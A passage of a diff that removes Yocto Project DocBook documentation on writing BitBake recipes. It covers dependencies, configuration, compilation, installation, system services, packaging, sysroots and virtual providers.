-                These dependencies fall into two main categories: build-time
-                dependencies, which are required when the software is built;
-                and runtime dependencies, which are required to be installed
-                on the target in order for the software to run.
-            </para>
-
-            <para>
-                Within a recipe, you specify build-time dependencies using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                variable.
-                Although nuances exist, items specified in
-                <filename>DEPENDS</filename> should be names of other recipes.
-                It is important that you specify all build-time dependencies
-                explicitly.
-                If you do not, due to the parallel nature of BitBake's
-                execution, you can end up with a race condition where the
-                dependency is present for one task of a recipe (e.g.
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>)
-                and then gone when the next task runs (e.g.
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>).
-            </para>
-
-            <para>
-                Another consideration is that configure scripts might
-                automatically check for optional dependencies and enable
-                corresponding functionality if those dependencies are found.
-                This behavior means that to ensure deterministic results and
-                thus avoid more race conditions, you need to either explicitly
-                specify these dependencies as well, or tell the configure
-                script explicitly to disable the functionality.
-                If you wish to make a recipe that is more generally useful
-                (e.g. publish the recipe in a layer for others to use),
-                instead of hard-disabling the functionality, you can use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></ulink>
-                variable to allow functionality and the corresponding
-                dependencies to be enabled and disabled easily by other
-                users of the recipe.
-            </para>
-
-            <para>
-                Similar to build-time dependencies, you specify runtime
-                dependencies through a variable -
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>,
-                which is package-specific.
-                All variables that are package-specific need to have the name
-                of the package added to the end as an override.
-                Since the main package for a recipe has the same name as the
-                recipe, and the recipe's name can be found through the
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
-                variable, then you specify the dependencies for the main
-                package by setting <filename>RDEPENDS_${PN}</filename>.
-                If the package were named <filename>${PN}-tools</filename>,
-                then you would set <filename>RDEPENDS_${PN}-tools</filename>,
-                and so forth.
-            </para>
-
-            <para>
-                Some runtime dependencies will be set automatically at
-                packaging time.
-                These dependencies include any shared library dependencies
-                (i.e. if a package "example" contains "libexample" and
-                another package "mypackage" contains a binary that links to
-                "libexample" then the OpenEmbedded build system will
-                automatically add a runtime dependency to "mypackage" on
-                "example").
-                See the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-                section in the Yocto Project Overview and Concepts Manual for
-                further details.
-            </para>
-        </section>
-
-        <section id='new-recipe-configuring-the-recipe'>
-            <title>Configuring the Recipe</title>
-
-            <para>
-                Most software provides some means of setting build-time
-                configuration options before compilation.
-                Typically, setting these options is accomplished by running a
-                configure script with options, or by modifying a build
-                configuration file.
-                <note>
-                    As of Yocto Project Release 1.7, some of the core recipes
-                    that package binary configuration scripts now disable the
-                    scripts due to the scripts previously requiring error-prone
-                    path substitution.
-                    The OpenEmbedded build system uses
-                    <filename>pkg-config</filename> now, which is much more
-                    robust.
-                    You can find a list of the <filename>*-config</filename>
-                    scripts that are disabled list in the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#migration-1.7-binary-configuration-scripts-disabled'>Binary Configuration Scripts Disabled</ulink>"
-                    section in the Yocto Project Reference Manual.
-                </note>
-            </para>
-
-            <para>
-                A major part of build-time configuration is about checking for
-                build-time dependencies and possibly enabling optional
-                functionality as a result.
-                You need to specify any build-time dependencies for the
-                software you are building in your recipe's
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                value, in terms of other recipes that satisfy those
-                dependencies.
-                You can often find build-time or runtime
-                dependencies described in the software's documentation.
-            </para>
-
-            <para>
-                The following list provides configuration items of note based
-                on how your software is built:
-                <itemizedlist>
-                    <listitem><para><emphasis>Autotools:</emphasis>
-                        If your source files have a
-                        <filename>configure.ac</filename> file, then your
-                        software is built using Autotools.
-                        If this is the case, you just need to worry about
-                        modifying the configuration.</para>
-
-                        <para>When using Autotools, your recipe needs to inherit
-                        the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
-                        class and your recipe does not have to contain a
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                        task.
-                        However, you might still want to make some adjustments.
-                        For example, you can set
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></ulink>
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
-                        to pass any needed configure options that are specific
-                        to the recipe.
-                        </para></listitem>
-                    <listitem><para><emphasis>CMake:</emphasis>
-                        If your source files have a
-                        <filename>CMakeLists.txt</filename> file, then your
-                        software is built using CMake.
-                        If this is the case, you just need to worry about
-                        modifying the configuration.</para>
-
-                        <para>When you use CMake, your recipe needs to inherit
-                        the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-cmake'><filename>cmake</filename></ulink>
-                        class and your recipe does not have to contain a
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                        task.
-                        You can make some adjustments by setting
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECMAKE'><filename>EXTRA_OECMAKE</filename></ulink>
-                        to pass any needed configure options that are specific
-                        to the recipe.
-                        <note>
-                            If you need to install one or more custom CMake
-                            toolchain files that are supplied by the
-                            application you are building, install the files to
-                            <filename>${D}${datadir}/cmake/</filename> Modules
-                            during
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>.
-                        </note>
-                        </para></listitem>
-                    <listitem><para><emphasis>Other:</emphasis>
-                        If your source files do not have a
-                        <filename>configure.ac</filename> or
-                        <filename>CMakeLists.txt</filename> file, then your
-                        software is built using some method other than Autotools
-                        or CMake.
-                        If this is the case, you normally need to provide a
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                        task in your recipe
-                        unless, of course, there is nothing to configure.
-                        </para>
-                        <para>Even if your software is not being built by
-                        Autotools or CMake, you still might not need to deal
-                        with any configuration issues.
-                        You need to determine if configuration is even a required step.
-                        You might need to modify a Makefile or some configuration file
-                        used for the build to specify necessary build options.
-                        Or, perhaps you might need to run a provided, custom
-                        configure script with the appropriate options.</para>
-                        <para>For the case involving a custom configure
-                        script, you would run
-                        <filename>./configure --help</filename> and look for
-                        the options you need to set.</para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Once configuration succeeds, it is always good practice to
-                look at the <filename>log.do_configure</filename> file to
-                ensure that the appropriate options have been enabled and no
-                additional build-time dependencies need to be added to
-                <filename>DEPENDS</filename>.
-                For example, if the configure script reports that it found
-                something not mentioned in <filename>DEPENDS</filename>, or
-                that it did not find something that it needed for some
-                desired optional functionality, then you would need to add
-                those to <filename>DEPENDS</filename>.
-                Looking at the log might also reveal items being checked for,
-                enabled, or both that you do not want, or items not being found
-                that are in <filename>DEPENDS</filename>, in which case
-                you would need to look at passing extra options to the
-                configure script as needed.
-                For reference information on configure options specific to the
-                software you are building, you can consult the output of the
-                <filename>./configure --help</filename> command within
-                <filename>${S}</filename> or consult the software's upstream
-                documentation.
-            </para>
-        </section>
-
-        <section id='new-recipe-using-headers-to-interface-with-devices'>
-            <title>Using Headers to Interface with Devices</title>
-
-            <para>
-                If your recipe builds an application that needs to
-                communicate with some device or needs an API into a custom
-                kernel, you will need to provide appropriate header files.
-                Under no circumstances should you ever modify the existing
-                <filename>meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc</filename>
-                file.
-                These headers are used to build <filename>libc</filename> and
-                must not be compromised with custom or machine-specific
-                header information.
-                If you customize <filename>libc</filename> through modified
-                headers all other applications that use
-                <filename>libc</filename> thus become affected.
-                <note><title>Warning</title>
-                    Never copy and customize the <filename>libc</filename>
-                    header file (i.e.
-                    <filename>meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc</filename>).
-                </note>
-                The correct way to interface to a device or custom kernel is
-                to use a separate package that provides the additional headers
-                for the driver or other unique interfaces.
-                When doing so, your application also becomes responsible for
-                creating a dependency on that specific provider.
-            </para>
-
-            <para>
-                Consider the following:
-                <itemizedlist>
-                    <listitem><para>
-                        Never modify
-                        <filename>linux-libc-headers.inc</filename>.
-                        Consider that file to be part of the
-                        <filename>libc</filename> system, and not something
-                        you use to access the kernel directly.
-                        You should access <filename>libc</filename> through
-                        specific <filename>libc</filename> calls.
-                        </para></listitem>
-                    <listitem><para>
-                        Applications that must talk directly to devices
-                        should either provide necessary headers themselves,
-                        or establish a dependency on a special headers package
-                        that is specific to that driver.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                For example, suppose you want to modify an existing header
-                that adds I/O control or network support.
-                If the modifications are used by a small number programs,
-                providing a unique version of a header is easy and has little
-                impact.
-                When doing so, bear in mind the guidelines in the previous
-                list.
-                <note>
-                    If for some reason your changes need to modify the behavior
-                    of the <filename>libc</filename>, and subsequently all
-                    other applications on the system, use a
-                    <filename>.bbappend</filename> to modify the
-                    <filename>linux-kernel-headers.inc</filename> file.
-                    However, take care to not make the changes
-                    machine specific.
-                </note>
-            </para>
-
-            <para>
-                Consider a case where your kernel is older and you need
-                an older <filename>libc</filename> ABI.
-                The headers installed by your recipe should still be a
-                standard mainline kernel, not your own custom one.
-            </para>
-
-            <para>
-                When you use custom kernel headers you need to get them from
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></ulink>,
-                which is the directory with kernel headers that are
-                required to build out-of-tree modules.
-                Your recipe will also need the following:
-                <literallayout class='monospaced'>
-     do_configure[depends] += "virtual/kernel:do_shared_workdir"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='new-recipe-compilation'>
-            <title>Compilation</title>
-
-            <para>
-                During a build, the <filename>do_compile</filename> task
-                happens after source is fetched, unpacked, and configured.
-                If the recipe passes through <filename>do_compile</filename>
-                successfully, nothing needs to be done.
-            </para>
-
-            <para>
-                However, if the compile step fails, you need to diagnose the
-                failure.
-                Here are some common issues that cause failures.
-                <note>
-                    For cases where improper paths are detected for
-                    configuration files or for when libraries/headers cannot
-                    be found, be sure you are using the more robust
-                    <filename>pkg-config</filename>.
-                    See the note in section
-                    "<link linkend='new-recipe-configuring-the-recipe'>Configuring the Recipe</link>"
-                    for additional information.
-                </note>
-                <itemizedlist>
-                    <listitem><para><emphasis>Parallel build failures:</emphasis>
-                        These failures manifest themselves as intermittent
-                        errors, or errors reporting that a file or directory
-                        that should be created by some other part of the build
-                        process could not be found.
-                        This type of failure can occur even if, upon inspection,
-                        the file or directory does exist after the build has
-                        failed, because that part of the build process happened
-                        in the wrong order.</para>
-                        <para>To fix the problem, you need to either satisfy
-                        the missing dependency in the Makefile or whatever
-                        script produced the Makefile, or (as a workaround)
-                        set
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></ulink>
-                        to an empty string:
-                        <literallayout class='monospaced'>
-     PARALLEL_MAKE = ""
-                        </literallayout></para>
-                        <para>
-                            For information on parallel Makefile issues, see the
-                            "<link linkend='debugging-parallel-make-races'>Debugging Parallel Make Races</link>"
-                            section.
-                            </para></listitem>
-                    <listitem><para><emphasis>Improper host path usage:</emphasis>
-                        This failure applies to recipes building for the target
-                        or <filename>nativesdk</filename> only.
-                        The failure occurs when the compilation process uses
-                        improper headers, libraries, or other files from the
-                        host system when cross-compiling for the target.
-                        </para>
-                        <para>To fix the problem, examine the
-                        <filename>log.do_compile</filename> file to identify
-                        the host paths being used (e.g.
-                        <filename>/usr/include</filename>,
-                        <filename>/usr/lib</filename>, and so forth) and then
-                        either add configure options, apply a patch, or do both.
-                        </para></listitem>
-                    <listitem><para><emphasis>Failure to find required
-                        libraries/headers:</emphasis>
-                        If a build-time dependency is missing because it has
-                        not been declared in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>,
-                        or because the dependency exists but the path used by
-                        the build process to find the file is incorrect and the
-                        configure step did not detect it, the compilation
-                        process could fail.
-                        For either of these failures, the compilation process
-                        notes that files could not be found.
-                        In these cases, you need to go back and add additional
-                        options to the configure script as well as possibly
-                        add additional build-time dependencies to
-                        <filename>DEPENDS</filename>.</para>
-                        <para>Occasionally, it is necessary to apply a patch
-                        to the source to ensure the correct paths are used.
-                        If you need to specify paths to find files staged
-                        into the sysroot from other recipes, use the variables
-                        that the OpenEmbedded build system provides
-                        (e.g.
-                        <filename>STAGING_BINDIR</filename>,
-                        <filename>STAGING_INCDIR</filename>,
-                        <filename>STAGING_DATADIR</filename>, and so forth).
-<!--
-                        (e.g.
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_BINDIR'><filename>STAGING_BINDIR</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_INCDIR'><filename>STAGING_INCDIR</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DATADIR'><filename>STAGING_DATADIR</filename></ulink>,
-                        and so forth).
--->
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='new-recipe-installing'>
-            <title>Installing</title>
-
-            <para>
-                During <filename>do_install</filename>, the task copies the
-                built files along with their hierarchy to locations that
-                would mirror their locations on the target device.
-                The installation process copies files from the
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>,
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-B'><filename>B</filename></ulink><filename>}</filename>,
-                and
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename>
-                directories to the
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>
-                directory to create the structure as it should appear on the
-                target system.
-            </para>
-
-            <para>
-                How your software is built affects what you must do to be
-                sure your software is installed correctly.
-                The following list describes what you must do for installation
-                depending on the type of build system used by the software
-                being built:
-                <itemizedlist>
-                    <listitem><para><emphasis>Autotools and CMake:</emphasis>
-                        If the software your recipe is building uses Autotools
-                        or CMake, the OpenEmbedded build
-                        system understands how to install the software.
-                        Consequently, you do not have to have a
-                        <filename>do_install</filename> task as part of your
-                        recipe.
-                        You just need to make sure the install portion of the
-                        build completes with no issues.
-                        However, if you wish to install additional files not
-                        already being installed by
-                        <filename>make install</filename>, you should do this
-                        using a <filename>do_install_append</filename> function
-                        using the install command as described in
-                        the "Manual" bulleted item later in this list.
-                        </para></listitem>
-                    <listitem><para><emphasis>Other (using
-                        <filename>make install</filename>):</emphasis>
-                        You need to define a
-                        <filename>do_install</filename> function in your
-                        recipe.
-                        The function should call
-                        <filename>oe_runmake install</filename> and will likely
-                        need to pass in the destination directory as well.
-                        How you pass that path is dependent on how the
-                        <filename>Makefile</filename> being run is written
-                        (e.g. <filename>DESTDIR=${D}</filename>,
-                        <filename>PREFIX=${D}</filename>,
-                        <filename>INSTALLROOT=${D}</filename>, and so forth).
-                        </para>
-                        <para>For an example recipe using
-                        <filename>make install</filename>, see the
-                        "<link linkend='new-recipe-makefile-based-package'>Makefile-Based Package</link>"
-                        section.</para></listitem>
-                    <listitem><para><emphasis>Manual:</emphasis>
-                        You need to define a
-                        <filename>do_install</filename> function in your
-                        recipe.
-                        The function must first use
-                        <filename>install -d</filename> to create the
-                        directories under
-                        <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>.
-                        Once the directories exist, your function can use
-                        <filename>install</filename> to manually install the
-                        built software into the directories.</para>
-                        <para>You can find more information on
-                        <filename>install</filename> at
-                        <ulink url='http://www.gnu.org/software/coreutils/manual/html_node/install-invocation.html'></ulink>.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                For the scenarios that do not use Autotools or
-                CMake, you need to track the installation
-                and diagnose and fix any issues until everything installs
-                correctly.
-                You need to look in the default location of
-                <filename>${D}</filename>, which is
-                <filename>${WORKDIR}/image</filename>, to be sure your
-                files have been installed correctly.
-            </para>
-
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        During the installation process, you might need to
-                        modify some of the installed files to suit the target
-                        layout.
-                        For example, you might need to replace hard-coded paths
-                        in an initscript with values of variables provided by
-                        the build system, such as replacing
-                        <filename>/usr/bin/</filename> with
-                        <filename>${bindir}</filename>.
-                        If you do perform such modifications during
-                        <filename>do_install</filename>, be sure to modify the
-                        destination file after copying rather than before
-                        copying.
-                        Modifying after copying ensures that the build system
-                        can re-execute <filename>do_install</filename> if
-                        needed.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>oe_runmake install</filename>, which can be
-                        run directly or can be run indirectly by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
-                        and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-cmake'><filename>cmake</filename></ulink>
-                        classes, runs <filename>make install</filename> in
-                        parallel.
-                        Sometimes, a Makefile can have missing dependencies
-                        between targets that can result in race conditions.
-                        If you experience intermittent failures during
-                        <filename>do_install</filename>, you might be able to
-                        work around them by disabling parallel Makefile
-                        installs by adding the following to the recipe:
-                        <literallayout class='monospaced'>
-     PARALLEL_MAKEINST = ""
-                        </literallayout>
-                        See
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename></ulink>
-                        for additional information.
-                        </para></listitem>
-                    <listitem><para>
-                        If you need to install one or more custom CMake
-                        toolchain files that are supplied by the
-                        application you are building, install the files to
-                        <filename>${D}${datadir}/cmake/</filename> Modules
-                        during
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </section>
-
-        <section id='new-recipe-enabling-system-services'>
-            <title>Enabling System Services</title>
-
-            <para>
-                If you want to install a service, which is a process that
-                usually starts on boot and runs in the background, then
-                you must include some additional definitions in your recipe.
-            </para>
-
-            <para>
-                If you are adding services and the service initialization
-                script or the service file itself is not installed, you must
-                provide for that installation in your recipe using a
-                <filename>do_install_append</filename> function.
-                If your recipe already has a <filename>do_install</filename>
-                function, update the function near its end rather than
-                adding an additional <filename>do_install_append</filename>
-                function.
-            </para>
-
-            <para>
-                When you create the installation for your services, you need
-                to accomplish what is normally done by
-                <filename>make install</filename>.
-                In other words, make sure your installation arranges the output
-                similar to how it is arranged on the target system.
-            </para>
-
-            <para>
-                The OpenEmbedded build system provides support for starting
-                services two different ways:
-                <itemizedlist>
-                    <listitem><para><emphasis>SysVinit:</emphasis>
-                        SysVinit is a system and service manager that
-                        manages the init system used to control the very basic
-                        functions of your system.
-                        The init program is the first program
-                        started by the Linux kernel when the system boots.
-                        Init then controls the startup, running and shutdown
-                        of all other programs.</para>
-                        <para>To enable a service using SysVinit, your recipe
-                        needs to inherit the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-update-rc.d'><filename>update-rc.d</filename></ulink>
-                        class.
-                        The class helps facilitate safely installing the
-                        package on the target.</para>
-                        <para>You will need to set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INITSCRIPT_PACKAGES'><filename>INITSCRIPT_PACKAGES</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INITSCRIPT_NAME'><filename>INITSCRIPT_NAME</filename></ulink>,
-                        and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INITSCRIPT_PARAMS'><filename>INITSCRIPT_PARAMS</filename></ulink>
-                        variables within your recipe.</para></listitem>
-                    <listitem><para><emphasis>systemd:</emphasis>
-                        System Management Daemon (systemd) was designed to
-                        replace SysVinit and to provide
-                        enhanced management of services.
-                        For more information on systemd, see the systemd
-                        homepage at
-                        <ulink url='http://freedesktop.org/wiki/Software/systemd/'></ulink>.
-                        </para>
-                        <para>To enable a service using systemd, your recipe
-                        needs to inherit the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-systemd'><filename>systemd</filename></ulink>
-                        class.
-                        See the <filename>systemd.bbclass</filename> file
-                        located in your
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                        section for more information.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='new-recipe-packaging'>
-            <title>Packaging</title>
-
-            <para>
-                Successful packaging is a combination of automated processes
-                performed by the OpenEmbedded build system and some
-                specific steps you need to take.
-                The following list describes the process:
-                <itemizedlist>
-                    <listitem><para><emphasis>Splitting Files</emphasis>:
-                        The <filename>do_package</filename> task splits the
-                        files produced by the recipe into logical components.
-                        Even software that produces a single binary might
-                        still have debug symbols, documentation, and other
-                        logical components that should be split out.
-                        The <filename>do_package</filename> task ensures
-                        that files are split up and packaged correctly.
-                        </para></listitem>
-                    <listitem><para><emphasis>Running QA Checks</emphasis>:
-                        The
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-insane'><filename>insane</filename></ulink>
-                        class adds a step to
-                        the package generation process so that output quality
-                        assurance checks are generated by the OpenEmbedded
-                        build system.
-                        This step performs a range of checks to be sure the
-                        build's output is free of common problems that show
-                        up during runtime.
-                        For information on these checks, see the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-insane'><filename>insane</filename></ulink>
-                        class and the
-                        "<ulink url='&YOCTO_DOCS_REF_URL;#ref-qa-checks'>QA Error and Warning Messages</ulink>"
-                        chapter in the Yocto Project Reference Manual.
-                        </para></listitem>
-                    <listitem><para><emphasis>Hand-Checking Your Packages</emphasis>:
-                        After you build your software, you need to be sure
-                        your packages are correct.
-                        Examine the
-                        <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/packages-split</filename>
-                        directory and make sure files are where you expect
-                        them to be.
-                        If you discover problems, you can set
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>,
-                        <filename>do_install(_append)</filename>, and so forth as
-                        needed.
-                        </para></listitem>
-                    <listitem><para><emphasis>Splitting an Application into Multiple Packages</emphasis>:
-                        If you need to split an application into several
-                        packages, see the
-                        "<link linkend='splitting-an-application-into-multiple-packages'>Splitting an Application into Multiple Packages</link>"
-                        section for an example.
-                        </para></listitem>
-                    <listitem><para><emphasis>Installing a Post-Installation Script</emphasis>:
-                        For an example showing how to install a
-                        post-installation script, see the
-                        "<link linkend='new-recipe-post-installation-scripts'>Post-Installation Scripts</link>"
-                        section.
-                        </para></listitem>
-                    <listitem><para><emphasis>Marking Package Architecture</emphasis>:
-                        Depending on what your recipe is building and how it
-                        is configured, it might be important to mark the
-                        packages produced as being specific to a particular
-                        machine, or to mark them as not being specific to
-                        a particular machine or architecture at all.</para>
-                        <para>By default, packages apply to any machine with the
-                        same architecture as the target machine.
-                        When a recipe produces packages that are
-                        machine-specific (e.g. the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        value is passed into the configure script or a patch
-                        is applied only for a particular machine), you should
-                        mark them as such by adding the following to the
-                        recipe:
-                        <literallayout class='monospaced'>
-     PACKAGE_ARCH = "${MACHINE_ARCH}"
-                        </literallayout></para>
-                        <para>On the other hand, if the recipe produces packages
-                        that do not contain anything specific to the target
-                        machine or architecture at all (e.g. recipes
-                        that simply package script files or configuration
-                        files), you should use the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-allarch'><filename>allarch</filename></ulink>
-                        class to do this for you by adding this to your
-                        recipe:
-                        <literallayout class='monospaced'>
-     inherit allarch
-                        </literallayout>
-                        Ensuring that the package architecture is correct is
-                        not critical while you are doing the first few builds
-                        of your recipe.
-                        However, it is important in order
-                        to ensure that your recipe rebuilds (or does not
-                        rebuild) appropriately in response to changes in
-                        configuration, and to ensure that you get the
-                        appropriate packages installed on the target machine,
-                        particularly if you run separate builds for more
-                        than one target machine.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='new-sharing-files-between-recipes'>
-            <title>Sharing Files Between Recipes</title>
-
-            <para>
-                Recipes often need to use files provided by other recipes on
-                the build host.
-                For example, an application linking to a common library needs
-                access to the library itself and its associated headers.
-                The way this access is accomplished is by populating a sysroot
-                with files.
-                Each recipe has two sysroots in its work directory, one for
-                target files
-                (<filename>recipe-sysroot</filename>) and one for files that
-                are native to the build host
-                (<filename>recipe-sysroot-native</filename>).
-                <note>
-                    You could find the term "staging" used within the Yocto
-                    project regarding files populating sysroots (e.g. the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR'><filename>STAGING_DIR</filename></ulink>
-                    variable).
-                </note>
-            </para>
-
-            <para>
-                Recipes should never populate the sysroot directly (i.e. write
-                files into sysroot).
-                Instead, files should be installed into standard locations
-                during the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                task within the
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink><filename>}</filename>
-                directory.
-                The reason for this limitation is that almost all files that
-                populate the sysroot are cataloged in manifests in order to
-                ensure the files can be removed later when a recipe is either
-                modified or removed.
-                Thus, the sysroot is able to remain free from stale files.
-            </para>
-
-            <para>
-                A subset of the files installed by the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                task are used by the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
-                task as defined by the the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></ulink>
-                variable to automatically populate the sysroot.
-                It is possible to modify the list of directories that populate
-                the sysroot.
-                The following example shows how you could add the
-                <filename>/opt</filename> directory to the list of
-                directories within a recipe:
-                <literallayout class='monospaced'>
-     SYSROOT_DIRS += "/opt"
-                </literallayout>
-            </para>
-
-            <para>
-                For a more complete description of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
-                task and its associated functions, see the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-staging'><filename>staging</filename></ulink>
-                class.
-            </para>
-        </section>
-
-        <section id='metadata-virtual-providers'>
-            <title>Using Virtual Providers</title>
-
-            <para>
-                Prior to a build, if you know that several different recipes
-                provide the same functionality, you can use a virtual provider
-                (i.e. <filename>virtual/*</filename>) as a placeholder for the
-                actual provider.
-                The actual provider is determined at build-time.
-            </para>
-
-            <para>
-                A common scenario where a virtual provider is used would be
-                for the kernel recipe.
-                Suppose you have three kernel recipes whose
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>
-                values map to <filename>kernel-big</filename>,
-                <filename>kernel-mid</filename>, and
-                <filename>kernel-small</filename>.
-                Furthermore, each of these recipes in some way uses a
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PROVIDES'><filename>PROVIDES</filename></ulink>
-                statement that essentially identifies itself as being able
-                to provide <filename>virtual/kernel</filename>.
-                Here is one way through the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-kernel'><filename>kernel</filename></ulink>
-                class:
-                <literallayout class='monospaced'>
-     PROVIDES += "${@ "virtual/kernel" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else "" }"
-                </literallayout>
-                Any recipe that inherits the <filename>kernel</filename> class
-                is going to utilize a <filename>PROVIDES</filename> statement
-                that identifies that recipe as being able to provide the
-                <filename>virtual/kernel</filename> item.
-            </para>
-
-            <para>
-                Now comes the time to actually build an image and you need a
-                kernel recipe, but which one?
-                You can configure your build to call out the kernel recipe
-                you want by using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></ulink>
-                variable.
-                As an example, consider the
-                <ulink url='https://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/machine/include/x86-base.inc'><filename>x86-base.inc</filename></ulink>
-                include file, which is a machine
-                (i.e. <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>)
-                configuration file.
-                This include file is the reason all x86-based machines use the
-                <filename>linux-yocto</filename> kernel.
-                Here are the relevant lines from the include file:
-                <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel ??= "linux-yocto"
-     PREFERRED_VERSION_linux-yocto ??= "4.15%"
-                </literallayout>
-            </para>
-
-            <para>
-                When you use a virtual provider, you do not have to
-                "hard code" a recipe name as a build dependency.
-                You can use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                variable to state the build is dependent on
-                <filename>virtual/kernel</filename> for example:
-                <literallayout class='monospaced'>
-     DEPENDS = "virtual/kernel"
-                </literallayout>
-                During the build, the OpenEmbedded build system picks
-                the correct recipe needed for the
